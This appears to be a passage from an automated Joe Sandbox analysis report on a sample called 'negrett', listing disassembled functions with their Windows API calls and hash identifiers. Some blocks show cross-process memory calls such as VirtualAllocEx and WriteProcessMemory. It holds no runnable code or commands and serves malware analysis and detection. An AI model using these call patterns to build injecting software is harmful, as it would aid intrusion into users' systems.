                                                • Opcode Fuzzy Hash: 3890d703f7ea146fcb4efc749df72bd74b23163155a5f2f9b3b7e357d1c9b5e8
                                                • Instruction Fuzzy Hash: 0641D676A402049FCB24DFB8D9C0A9DB7F6EF89714F1545A9D51AEB390DB31E901CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 3ef6c03ab5246ef55c89b643c32a9a2ce576d11849372ccfc7c191bbf6455716
                                                • Instruction ID: a090c536b846d6a067d8d7d532860f7d767f7065a74da97ef8d1c615e61f5a38
                                                • Opcode Fuzzy Hash: 3ef6c03ab5246ef55c89b643c32a9a2ce576d11849372ccfc7c191bbf6455716
                                                • Instruction Fuzzy Hash: D841D232A002109FDB24DF78C881A5EB7F5EF89314F5545A9F515EB356DB31AE01EB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsWindow.USER32(00000000), ref: 00B90951
                                                • GetForegroundWindow.USER32 ref: 00B90968
                                                • GetDC.USER32(00000000), ref: 00B909A4
                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00B909B0
                                                • ReleaseDC.USER32(00000000,00000003), ref: 00B909E8
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Window$ForegroundPixelRelease
                                                • String ID:
                                                • API String ID: 4156661090-0
                                                • Opcode ID: e00dbe52cb4815b5ba21ddf9d860db00d280cbe7bc2397325d2b9e04b01198af
                                                • Instruction ID: e543d7bd13de03f3d69e13ed39ce852990ceba027c2800320bd8b41be5c9cc87
                                                • Opcode Fuzzy Hash: e00dbe52cb4815b5ba21ddf9d860db00d280cbe7bc2397325d2b9e04b01198af
                                                • Instruction Fuzzy Hash: FE218135600204AFD704EF69C985AAEBBE9EF45700F0484ACE84AA7362DB30AC44CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 00B4CDC6
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4CDE9
                                                  • Part of subcall function 00B43820: RtlAllocateHeap.NTDLL(00000000,?,00BE1444,?,00B2FDF5,?,?,00B1A976,00000010,00BE1440,00B113FC,?,00B113C6,?,00B11129), ref: 00B43852
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B4CE0F
                                                • _free.LIBCMT ref: 00B4CE22
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B4CE31
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: 07f6067935d28ac95d43affe5c5ade049d55ffb30ff2a18643608ac206df1eab
                                                • Instruction ID: ebd0ee7c2a9ea47f09bc32dc1fb175894bcda2480b1b2dc0356498f1808b90ad
                                                • Opcode Fuzzy Hash: 07f6067935d28ac95d43affe5c5ade049d55ffb30ff2a18643608ac206df1eab
                                                • Instruction Fuzzy Hash: 2501D4726032157F27611ABA6C89C7B6EEDDEC7FA131501A9F905D7200EF619F02A1B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: b3e1830291eea80dcf21e65ab2d8b536b7e6a0cb8c488699daa5d9a5a3874387
                                                • Instruction ID: ad10590354088858678e8134bc39113a16de276d88487cae87743a059ae547d6
                                                • Opcode Fuzzy Hash: b3e1830291eea80dcf21e65ab2d8b536b7e6a0cb8c488699daa5d9a5a3874387
                                                • Instruction Fuzzy Hash: F801B5756412097BE6495E129C81FAF735DDA95398F004031FF08AA245FB74ED24CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,00B3F2DE,00B43863,00BE1444,?,00B2FDF5,?,?,00B1A976,00000010,00BE1440,00B113FC,?,00B113C6), ref: 00B42DFD
                                                • _free.LIBCMT ref: 00B42E32
                                                • _free.LIBCMT ref: 00B42E59
                                                • SetLastError.KERNEL32(00000000,00B11129), ref: 00B42E66
                                                • SetLastError.KERNEL32(00000000,00B11129), ref: 00B42E6F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: 469ec415c86d47c4bb54139a36f2f48be6d1ba9d388491f34c0d21c53947955f
                                                • Instruction ID: 6652e5b43a02af84269bc2cf0ba1ef7e9265b5e7c59677ff2b3edd1e1859135e
                                                • Opcode Fuzzy Hash: 469ec415c86d47c4bb54139a36f2f48be6d1ba9d388491f34c0d21c53947955f
                                                • Instruction Fuzzy Hash: 7401F93218560177CA1267396C86D2B2AE9EBD17A17E440A5F411E3292EF74CF017120
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CLSIDFromProgID.OLE32 ref: 00B7002B
                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 00B70046
                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B6FF41,80070057,?,?), ref: 00B70054
                                                • CoTaskMemFree.OLE32(00000000), ref: 00B70064
                                                • CLSIDFromString.OLE32(?,?), ref: 00B70070
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                • String ID:
                                                • API String ID: 3897988419-0
                                                • Opcode ID: 427beb1d5271d733baa846e1dd1811967a197fb205d602c6ebe02e1e807e9884
                                                • Instruction ID: 88865652cc767af821fc9e20c424004438254cc9a153894ae7ef5804c338f688
                                                • Opcode Fuzzy Hash: 427beb1d5271d733baa846e1dd1811967a197fb205d602c6ebe02e1e807e9884
                                                • Instruction Fuzzy Hash: 06018B72610208FFDF116F68EC45BAA7EEDEB447A2F148165F90AD3210EB75DD409BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00B7E997
                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 00B7E9A5
                                                • Sleep.KERNEL32(00000000), ref: 00B7E9AD
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00B7E9B7
                                                • Sleep.KERNEL32 ref: 00B7E9F3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                • Opcode ID: 9cee797c38895124995d3419329216a85d917778a351344ad7df3c7385466d20
                                                • Instruction ID: 207399164c1a4355c016e8c6d58d9def3c0f64cd826aae7abcaec2f80c28611a
                                                • Opcode Fuzzy Hash: 9cee797c38895124995d3419329216a85d917778a351344ad7df3c7385466d20
                                                • Instruction Fuzzy Hash: DB011B32D01629DBCF009BE5D859ADDBBB8FF0E701F004596E626B2241CB349555CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: cfcb50b0f919142ca6766bbde15bacbed395802718123c5dcad8eaf2515daed4
                                                • Instruction ID: 4ebcf1315d4b56b159a3c8cba03756fa629f7866c34d0b4d32d89da61a9b7a7f
                                                • Opcode Fuzzy Hash: cfcb50b0f919142ca6766bbde15bacbed395802718123c5dcad8eaf2515daed4
                                                • Instruction Fuzzy Hash: 4201D872800B029FCB30AF66D880802FBF9FF602453058A3ED1A252930C7B0A988CF84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 80a46d3f4cdf48cc1f4cb3fd7009116c9b0e75df3a7578b7af18df310060968e
                                                • Instruction ID: 0794b9cc25db19b2116bd13ba6d91639299e5bb122dd1d6d81706b2976104297
                                                • Opcode Fuzzy Hash: 80a46d3f4cdf48cc1f4cb3fd7009116c9b0e75df3a7578b7af18df310060968e
                                                • Instruction Fuzzy Hash: 13F06D72580305ABC760FB68FAC0C5A7BDFAE057207A40D0AF14DE7580CF30F8819A68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 4123fa34cb97fe27cc116b7268a18f97c13ccf456534f8fabfb79b2512b9f43b
                                                • Instruction ID: 0dc0ac5f2c312172eac39a425fbff6e615ee310b246a064fec3898b2b85e7beb
                                                • Opcode Fuzzy Hash: 4123fa34cb97fe27cc116b7268a18f97c13ccf456534f8fabfb79b2512b9f43b
                                                • Instruction Fuzzy Hash: FAF03A748422219B8711BF94BDC0D9D3BA6FB14751B14096FF818A32F0CB310413AF9C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 00B422BE
                                                  • Part of subcall function 00B429C8: HeapFree.KERNEL32(00000000,00000000), ref: 00B429DE
                                                  • Part of subcall function 00B429C8: GetLastError.KERNEL32(00000000,?,00B4D7D1,00000000,00000000,00000000,00000000,?,00B4D7F8,00000000,00000007,00000000,?,00B4DBF5,00000000,00000000), ref: 00B429F0
                                                • _free.LIBCMT ref: 00B422D0
                                                • _free.LIBCMT ref: 00B422E3
                                                • _free.LIBCMT ref: 00B422F4
                                                • _free.LIBCMT ref: 00B42305
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 22913d4a62476f37788f685e484896a3e59b8e898b81929031ad08ec689165d6
                                                • Instruction ID: cd10429ea3e5d578c5592ae5198b8fe0d940d0f7a597347bfd1dff05167a2c7b
                                                • Opcode Fuzzy Hash: 22913d4a62476f37788f685e484896a3e59b8e898b81929031ad08ec689165d6
                                                • Instruction Fuzzy Hash: 51F090704111919B8A12BF59BC8181C3FE4F7287607800597F000DB371CF724652FBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 029EF4A3: __onexit.LIBCMT ref: 029EF4A9
                                                • __Init_thread_footer.LIBCMT ref: 02A55638
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer__onexit
                                                • String ID: x#M$x#M$x#M
                                                • API String ID: 1881088180-3829861524
                                                • Opcode ID: c993cd85d4cb7fcfa16d8338dd849fd7bda11aea73c75cc1440591dd505b9bff
                                                • Instruction ID: 238e132ae310d0db5eb2aa5098793d70ba8eeea1b11dc9ef8f4f2117a04953d2
                                                • Opcode Fuzzy Hash: c993cd85d4cb7fcfa16d8338dd849fd7bda11aea73c75cc1440591dd505b9bff
                                                • Instruction Fuzzy Hash: 2CC17D71A00215EFDB14DF68C890EBEB7FAFF48310F54806AE955AB290DB74E945CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: __dosmaperr
                                                • String ID: H
                                                • API String ID: 2332233096-2852464175
                                                • Opcode ID: 7e821adffe91cbc9713f8d52b49a87b3260336805fc21dec40f5ae5b36cdbdbf
                                                • Instruction ID: ddd259b69ff81b0a55552d7397d96d157fa5bb58d72a7b3f04b43b98c00526f6
                                                • Opcode Fuzzy Hash: 7e821adffe91cbc9713f8d52b49a87b3260336805fc21dec40f5ae5b36cdbdbf
                                                • Instruction Fuzzy Hash: 9CA1F632A041088FDF29DF68E8D1BAD7BA1EB46324F14015EE811EF2E1DF359912CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B7B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B721D0,?,?,00000034,00000800,?,00000034), ref: 00B7B42D
                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B72760
                                                  • Part of subcall function 00B7B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00B7B3F8
                                                  • Part of subcall function 00B7B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00B7B355
                                                  • Part of subcall function 00B7B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B72194,00000034,?,?,00001004,00000000,00000000), ref: 00B7B365
                                                  • Part of subcall function 00B7B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B72194,00000034,?,?,00001004,00000000,00000000), ref: 00B7B37B
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B727CD
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B7281A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                • String ID: @
                                                • API String ID: 4150878124-2766056989
                                                • Opcode ID: 4521f8b076e934797aaa12f5efcc69c3488dbf073b8f72a8de7fe2a6b9987232
                                                • Instruction ID: db578234784f303129637cc3cea26466079735d4fa63767fdbec6e8cc4a7ff22
                                                • Opcode Fuzzy Hash: 4521f8b076e934797aaa12f5efcc69c3488dbf073b8f72a8de7fe2a6b9987232
                                                • Instruction Fuzzy Hash: 3341FD76900218AFDB10DBA4CD45FDEBBB8EF05700F108095FA59B7181DB716E85DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem
                                                • String ID: 0
                                                • API String ID: 135850232-4108050209
                                                • Opcode ID: 46f65101c7c373c64008ac59682f3a967e841f3d78adbab87c959ab335b89214
                                                • Instruction ID: 6517bae3fa029ebf2500f3337ae953a646f96d9201645f1c9bf34a82b2b7fe31
                                                • Opcode Fuzzy Hash: 46f65101c7c373c64008ac59682f3a967e841f3d78adbab87c959ab335b89214
                                                • Instruction Fuzzy Hash: 0C419D312043019FD720DF24D885B5ABFE4EB85320F11CA9DF9B9972D2D730A904CB6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BA44AA
                                                • GetWindowLongW.USER32 ref: 00BA44C7
                                                • SetWindowLongW.USER32 ref: 00BA44D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID: SysTreeView32
                                                • API String ID: 847901565-1698111956
                                                • Opcode ID: f1a2b79df53efcf56a61d4144d614781bbca2364b2489779aea2a8d94889eba1
                                                • Instruction ID: 9cd98804e9a7938d2fba072a565f1df5c4466e87479e903f0a5ac9e106db7bfb
                                                • Opcode Fuzzy Hash: f1a2b79df53efcf56a61d4144d614781bbca2364b2489779aea2a8d94889eba1
                                                • Instruction Fuzzy Hash: AA317E31214605AFDB208E78DC45BDA7BE9EB4A334F204765F979932E0DBB0AC509750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BA4705
                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BA4713
                                                • DestroyWindow.USER32 ref: 00BA471A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: MessageSend$DestroyWindow
                                                • String ID: msctls_updown32
                                                • API String ID: 4014797782-2298589950
                                                • Opcode ID: e7626479dc0d7e4e0dff486b9c0af17c4374d0cdf2534341b3b23b23c274e09c
                                                • Instruction ID: 6afd8a53a5e6b2b6448c92f271c756b8c6cf9fc5bc128cb16ef7aebd524604cd
                                                • Opcode Fuzzy Hash: e7626479dc0d7e4e0dff486b9c0af17c4374d0cdf2534341b3b23b23c274e09c
                                                • Instruction Fuzzy Hash: C2215EB5604248AFDB10DF68DCC1DBB37EDEB8B394B140499FA009B261DB70EC51CA60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 00B84A08
                                                • GetVolumeInformationW.KERNEL32 ref: 00B84A5C
                                                • SetErrorMode.KERNEL32(00000000,?,?,00BACC08), ref: 00B84AD0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume
                                                • String ID: %lu
                                                • API String ID: 2507767853-685833217
                                                • Opcode ID: 5efe8250d6404de381e5f468ac01c1181bfffd0d091a195a3fd04224d3976c3b
                                                • Instruction ID: 10fc1a7cf48dd2d1e9f20daf6a484fcfe67730c2e36beb86d4e02a38aa0899a4
                                                • Opcode Fuzzy Hash: 5efe8250d6404de381e5f468ac01c1181bfffd0d091a195a3fd04224d3976c3b
                                                • Instruction Fuzzy Hash: EE313075A00109AFD714DF54C885EAA7BF8EF09304F1480A5E909DB262DB71ED45CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BA424F
                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BA4264
